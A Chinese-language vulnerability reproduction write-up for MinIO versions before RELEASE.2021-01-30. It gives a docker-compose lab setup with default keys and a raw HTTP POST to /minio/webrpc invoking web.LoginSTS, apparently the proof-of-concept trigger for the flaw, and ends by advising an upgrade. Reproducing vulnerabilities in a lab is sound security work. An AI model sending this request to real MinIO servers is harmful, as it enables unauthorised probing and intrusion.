简介
MinIO是一个基于Apache License v2.0开源协议的对象存储服务。它兼容亚马逊S3云存储服务接口,适用于存储大容量非结构化的数据(如图片、视频、日志文件、备份数据和容器/虚拟机镜像等),作为一款支持部署在私有云的开源对象存储系统,MinIO在全球被广泛使用。
影响版本
MinIO < RELEASE.2021-01-30T00-20-58Z
环境搭建
这里使用docker进行安装
docker-compose.yml
version: '3.7'
services:
minio1:
image: minio/minio:RELEASE.2021-01-16T02-19-44Z
volumes:
- data1-1:/data1
- data1-2:/data2
ports:
- "9000:9000"
environment:
MINIO_ACCESS_KEY: minio
MINIO_SECRET_KEY: minio123
command: server http://minio{1...4}/data{1...2}
healthcheck:
test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
interval: 30s
timeout: 20s
retries: 3
## By default this config uses default local driver,
## For custom volumes replace with volume driver configuration.
volumes:
data1-1:
data1-2:
docker-compose up -d启动环境

启动之后需要等等。大概一分钟左右。
然后访问http://your-ip:9000/minio/login即可看到页面

漏洞复现
构建数据包并发送
POST /minio/webrpc HTTP/1.1
Host: 192.168.204.131:666
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Upgrade-Insecure-Requests: 1
Content-Length: 78
{"id":1,"jsonrpc":"2.0","params":{"token":"test"},"method":"web.LoginSTS"}

修复建议
升级到安全版本
https://github.com/minio/minio
|